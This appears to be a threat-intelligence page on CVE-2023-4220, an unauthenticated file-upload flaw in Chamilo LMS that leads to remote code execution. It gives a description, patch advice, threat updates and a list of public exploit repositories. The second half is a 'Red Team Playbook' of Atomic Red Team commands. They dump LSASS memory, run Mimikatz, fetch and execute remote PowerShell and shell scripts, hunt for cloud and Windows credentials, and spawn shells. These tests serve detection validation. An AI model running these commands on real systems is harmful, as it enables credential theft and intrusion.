CVE-2023-4220
Overview
This vulnerability is an unrestricted file upload flaw located in the big file upload functionality of Chamilo LMS, specifically within the /main/inc/lib/javascript/bigupload/inc/bigUpload.php component. The root cause is the lack of proper validation and restrictions on uploaded files, allowing attackers to submit arbitrary files without authentication. This improper input handling in the file upload mechanism enables malicious payloads to be stored on the server.
Vulnerability Description
Unrestricted file upload in big file upload functionality in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell.
Impact
An unauthenticated attacker can exploit this vulnerability remotely to upload malicious files, including web shells, leading to stored XSS and full remote code execution on the affected server. No prior authentication or user interaction is required (CVSS vector AV:N/AC:H/PR:N/UI:N). Successful exploitation can result in complete compromise of the Chamilo LMS instance, allowing data theft, service disruption, or further lateral movement within the network.
Solution
Chamilo LMS users should upgrade to versions later than v1.11.24 where this vulnerability has been patched, as detailed in the vendor advisory at https://support.chamilo.org/projects/chamilo-18/wiki/security_issues#Issue-130-2023-09-04-Critical-impact-High-risk-Unauthenticated-users-may-gain-XSS-and-unauthenticated-RCE-CVE-2023-4220. The patch is available in the repository commit 3b487a55076fb06f96809b790a35dcdd42f8ec49. Administrators are advised to apply this update promptly to remediate the unrestricted file upload flaw.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the big file upload functionality of Chamilo LMS presents a significant security risk due to its allowance for unrestricted file uploads. This flaw resides in the `bigUpload.php` script, which fails to adequately validate the type and content of files being uploaded. As a result, an attacker can upload malicious files, such as web shells, without authentication. This oversight in input validation and sanitization opens the door to various attack vectors, primarily enabling stored cross-site scripting (XSS) and remote code execution (RCE). The lack of proper restrictions on file types and sizes exacerbates the issue, allowing attackers to exploit this weakness with relative ease.
Exploitation of this vulnerability can occur in several scenarios. An attacker, without needing to authenticate, could leverage the big file upload feature to upload a malicious script disguised as a legitimate file. Once uploaded, this script can be executed on the server, leading to remote code execution. The attacker could then gain unauthorized access to the server, manipulate data, or even pivot to other systems within the network. Additionally, the stored XSS aspect of the vulnerability allows attackers to inject scripts that can be executed in the context of users accessing the compromised application, potentially leading to credential theft or further exploitation of client-side vulnerabilities.
The real-world impact of this vulnerability is substantial, particularly for organizations that rely on Chamilo LMS for educational purposes. The potential for remote code execution means that an attacker could gain full control over the server, compromising sensitive data, including user information and educational content. The business risks associated with such an incident include reputational damage, financial loss due to remediation efforts, and potential legal ramifications stemming from data breaches. Furthermore, the educational sector, often dealing with minors, faces heightened scrutiny and regulatory obligations, making the consequences of such a breach even more severe.
To detect and mitigate this vulnerability, organizations should implement a multi-layered security approach. First, it is crucial to conduct regular security audits and code reviews to identify and remediate vulnerabilities within the application. Employing a web application firewall (WAF) can help filter out malicious file uploads and block known attack patterns. Additionally, organizations should enforce strict file type validation and size restrictions on uploads, ensuring that only safe file types are permitted. Implementing security controls such as intrusion detection systems (IDS) can also aid in monitoring for unusual activity that may indicate exploitation attempts.
In conclusion, the unrestricted file upload vulnerability in Chamilo LMS poses a significant threat to organizations utilizing this platform. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare themselves against such threats. Proactive detection and mitigation strategies are essential in safeguarding sensitive data and maintaining the integrity of educational environments. As cyber threats continue to evolve, staying vigilant and adopting robust security measures will be critical in defending against similar vulnerabilities in the future.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting the unrestricted file upload vulnerability in Chamilo LMS. Our telemetry indicates a sustained increase in attacker activity leveraging publicly available proof-of-concept exploits, which remain widely accessible on multiple platforms. Although the EPSS score remains high and stable, the uptick in exploitation signals a growing interest from threat actors in weaponizing this vulnerability for remote code execution. This trend elevates the risk profile for organizations running affected versions of Chamilo LMS, as the ease of exploitation combined with unauthenticated access lowers the barrier for compromise. Defenders should recognize that the threat landscape is becoming more active, underscoring the urgency to monitor for indicators of compromise and anomalous file upload behaviors associated with this vulnerability.
Update 2 — May 15, 2026
CSURFACE threat intelligence has identified a moderate increase in exploitation attempts targeting CVE-2023-4220, accompanied by the emergence of additional publicly available proof-of-concept exploits. While the EPSS score shows a slight decline, this metric does not fully capture the growing operational interest evidenced by our telemetry. The proliferation of diverse exploit tools lowers the technical barrier for threat actors, potentially broadening the attacker base beyond highly skilled adversaries. This development is significant because it increases the likelihood of opportunistic attacks leveraging unauthenticated file upload vulnerabilities to achieve remote code execution within Chamilo LMS environments. Consequently, the threat level has shifted upward from medium to a heightened state of concern, reflecting an expanding attack surface and increased exploitation activity. Defenders should be aware that the evolving exploit landscape signals sustained adversary focus, which may translate into more frequent and varied intrusion attempts.
Update 3 — July 04, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2023-4220, accompanied by the emergence of several new proof-of-concept exploits circulating within attacker communities. Our telemetry indicates that adversaries are increasingly leveraging these publicly available tools to automate the upload of malicious web shells via the vulnerable big file upload functionality in Chamilo LMS. This development broadens the attacker base beyond highly skilled threat actors, enabling less sophisticated adversaries to conduct remote code execution attacks with greater ease. The expanded exploit landscape and sustained exploitation activity underscore a growing operational focus on this vulnerability, elevating the risk of compromise for unpatched Chamilo LMS deployments. Consequently, the threat level associated with CVE-2023-4220 has intensified, reflecting a heightened likelihood of opportunistic intrusions and persistent exploitation campaigns.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Chamilo | Chamilo Lms | All |
cpe:2.3:a:chamilo:chamilo_lms:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Chamilo v1.11.24 Unrestricted File Upload PHP Webshell
exploits/linux/http/chamilo_bigupload_webshell
|
Ngo Wei Lin, jheysel-r7 | Unknown | php | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Chamilo LMS 1.11.24 - Remote Code Execution (RCE) | Mohamed Kamel BOUZEKRIA | webapps | php | - | View |
GitHub PoCs (28)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
Ziad-Sakr/Chamilo-CVE-2023-4220-Exploit
This is an Exploit for Unrestricted file upload in big file upload functionality in Chamilo-LMS for this location "/main...
|
Ziad-Sakr | 5 | 3 | 2024-07-08 | View |
|
Rai2en/CVE-2023-4220-Chamilo-LMS
This is a script written in Python that allows the exploitation of the Chamilo's LMS software security flaw described in...
|
Rai2en | 5 | 2 | 2024-07-07 | View |
|
charlesgargasson/CVE-2023-4220
RCE Chamilo 1.11.24
|
charlesgargasson | 1 | 0 | 2024-07-07 | View |
|
thefizzyfish/CVE-2023-4220_Chamilo_RCE
Python exploit for Chamilo Unrestricted File Upload Vuln - CVE-2023-4220
|
thefizzyfish | 1 | 0 | 2024-08-24 | View |
|
0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit
(CVE-2023-4220) Chamilo LMS Unauthenticated Big Upload File Remote Code Execution
|
0x00-null | 1 | 0 | 2024-09-03 | View |
|
Pr1or95/CVE-2023-4220-exploit
Carga de archivos sin restricciones en la funcionalidad de carga de archivos grandes en `/main/inc/lib/javascript/bigupl...
|
Pr1or95 | 1 | 0 | 2024-12-05 | View |
|
zora-beep/CVE-2023-4220
Exploit for CVE-2023-4220
|
zora-beep | 1 | 0 | 2025-01-24 | View |
|
oxapavan/CVE-2023-4220-HTB-PermX
|
oxapavan | 1 | 0 | 2024-11-10 | View |
|
dollarboysushil/Chamilo-LMS-Unauthenticated-File-Upload-CVE-2023-4220
Unrestricted file upload in big file upload functionality in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in C...
|
dollarboysushil | 1 | 0 | 2024-07-07 | View |
|
N1ghtfallXxX/CVE-2023-4220
Chamilo LMS Unauthenticated Remote Code Execution
|
N1ghtfallXxX | 1 | 0 | 2024-07-07 | View |
|
bueno-armando/CVE-2023-4220-RCE
|
bueno-armando | 1 | 0 | 2024-10-23 | View |
|
RandyNin/CVE-2023-4220
|
RandyNin | 0 | 0 | 2026-03-24 | View |
|
SpeatX/ChamiloLMS-CVE-2023-4220
CVE-2023-4220 — Unauthenticated file upload RCE in Chamilo LMS ≤ 1.11.24. OSCP-style and auto exploit.
|
SpeatX | 0 | 0 | 2026-05-12 | View |
|
SpeatX/ChamiloLMS-cve-2023-4220
|
SpeatX | 0 | 0 | 2026-05-12 | View |
|
numaan911098/CVE-2023-4220
https://nvd.nist.gov/vuln/detail/CVE-2023-4220
|
numaan911098 | 0 | 0 | 2024-11-13 | View |
|
m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc
This is a script written in Python that allows the exploitation of the Chamilo's LMS software security flaw described in...
|
m3m0o | 0 | 0 | 2024-07-07 | View |
|
Al3xGD/CVE-2023-4220-Exploit
LMS Chamilo 1.11.24 CVE-2023-4220 Exploit
|
Al3xGD | 0 | 0 | 2024-07-15 | View |
|
LGenAgul/CVE-2023-4220-Proof-of-concept
Chamilo LMS Unauthenticated Big Upload File that allows remote code execution
|
LGenAgul | 0 | 0 | 2024-08-18 | View |
|
Least-Significant-Bit/CVE-2023-4220
Unauthenticated file upload for Chamilo 1.11.24 and lower
|
Least-Significant-Bit | 0 | 0 | 2026-01-13 | View |
|
0xDTC/Chamilo-LMS-CVE-2023-4220-Exploit
Refurbish Chamilo LMS CVE-2023-4220 exploit written in bash
|
0xDTC | 0 | 0 | 2024-10-27 | View |
|
VanishedPeople/CVE-2023-4220
CVE-2023-4220 PoC Chamilo RCE
|
VanishedPeople | 0 | 0 | 2024-08-24 | View |
|
Sn0wBaall/CVE-2023-4220-PoC
|
Sn0wBaall | 0 | 0 | 2026-02-12 | View |
|
nr4x4/CVE-2023-4220
CVE-2023–4220 Exploit
|
nr4x4 | 0 | 0 | 2024-07-11 | View |
|
charchit-subedi/chamilo-lms-unauthenticated-rce-poc
This is a script written in Python that allows the exploitation of the Chamilo's LMS software security flaw described in...
|
charchit-subedi | 0 | 0 | 2024-08-02 | View |
|
H4cking4All/CVE-2023-4220
CVE-2023-4220 Chamilo Exploit
|
H4cking4All | 0 | 0 | 2024-11-02 | View |
|
gmh5225/CVE-2023-4220
CVE-2023-4220 POC RCE
|
gmh5225 | 0 | 0 | 2024-07-29 | View |
|
qrxnz/CVE-2023-4220
CVE-2023-4220 Chamilo Exploit
|
qrxnz | 0 | 0 | 2024-08-27 | View |
|
HO4XXX/cve-2023-4220-poc
PoC for CVE-2023-4220 - Chamilo LMS - Unauthenticated File Upload in BigUpload
|
HO4XXX | 0 | 0 | 2024-07-09 | View |
Threat Feed
32 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
